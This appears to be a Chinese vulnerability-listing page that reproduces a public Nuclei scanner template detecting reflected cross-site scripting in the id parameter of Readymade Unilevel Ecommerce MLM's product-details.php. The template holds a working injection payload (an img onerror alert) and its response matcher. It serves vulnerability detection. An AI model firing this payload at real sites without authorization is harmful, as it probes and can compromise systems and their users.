readymade-unilevel-xss: Readymade Unilevel Ecommerce MLM - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Readymade Unilevel Ecommerce MLM | POC: 已公开

漏洞描述

Readymade Unilevel Ecommerce software has xss vulnerability in product-details.php?id

PoC代码[已公开]

id: readymade-unilevel-xss

info:
  name: Readymade Unilevel Ecommerce MLM - Cross-Site Scripting
  author: s4e-io
  severity: high
  description: |
    Readymade Unilevel Ecommerce software has xss vulnerability in product-details.php?id
  reference:
    - https://packetstormsecurity.com/files/179886/ReadyMade-Unilevel-Ecommerce-MLM-Blind-SQL-Injection-Cross-Site-Scripting.html
  metadata:
    vendor: i-netsolution
    product: readymade-unilevel-ecommerce
  tags: ecommerce,readymade,xss,vuln

variables:
  num1: "{{rand_int(1000, 9999)}}"

http:
  - raw:
      - |
        GET /product-details.php?id=1"><img/src/onerror=.1|alert`{{num1}}`+class={{num1}}> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "><img/src/onerror=.1|alert`{{num1}}` class={{num1}}>", "user_login_id")'
          - 'contains(content_type, "text/html")'
          - "status_code == 200"
        condition: and
# digest: 4b0a004830460221009997a208b1c9b49ecd9ad2ba8258473c25ada36d4e85528ba5502f378cc4953a022100a569cc67101987897a61bd8e405e415f9ecdacf7991ab79dc0d2848854a6efeb:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/other/readymade-unilevel-xss.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐